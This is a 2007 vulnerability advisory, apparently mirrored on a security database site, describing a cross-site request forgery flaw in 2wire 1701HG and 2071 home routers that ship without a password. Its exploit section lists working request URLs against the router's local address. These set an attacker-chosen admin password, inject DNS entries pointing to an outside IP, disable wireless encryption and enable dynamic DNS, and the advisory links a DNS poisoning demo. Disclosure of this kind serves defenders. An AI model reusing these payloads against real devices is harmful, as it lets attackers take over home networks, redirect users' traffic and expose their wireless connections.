Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17808
HistoryAug 16, 2007 - 12:00 a.m.

Cross Site Request Forgery in 2wire routers

2007-08-1600:00:00
vulners.com
51
JSON

Cross Site Request Forgery in 2wire routers

Vulnerable Routers: 1701HG, 2071 Gateway
Software: v3.17.5, 5.29.51 Password Not Set (default)

Greetz a la Comunidad Underground de Mйxico, y a los
que me ayudaron a probarlo: Preth00nker, nitr0us, …
[email protected]

I. Background

This is the most popular router in Mexico and the default installation from the ISP has no system password.

II. Vuln

It is possible to send a request to the router that will modify its configuration.

It does not validate POST, or Referer or Anything…

II. Exploit

We just need the client to do a request to the router with the configuration we desire.

[examples]

Set a password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS

Add names to the DNS (216.163.137.3 www.prueba.hkm):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.prueba.hkm&ADDR=216.163.137.3

Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0

Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE

Disable the Firewall
Reset the device
Etc…

DNS Poisoning demo: http://www.hakim.ws/2wire/demodns.html

JSON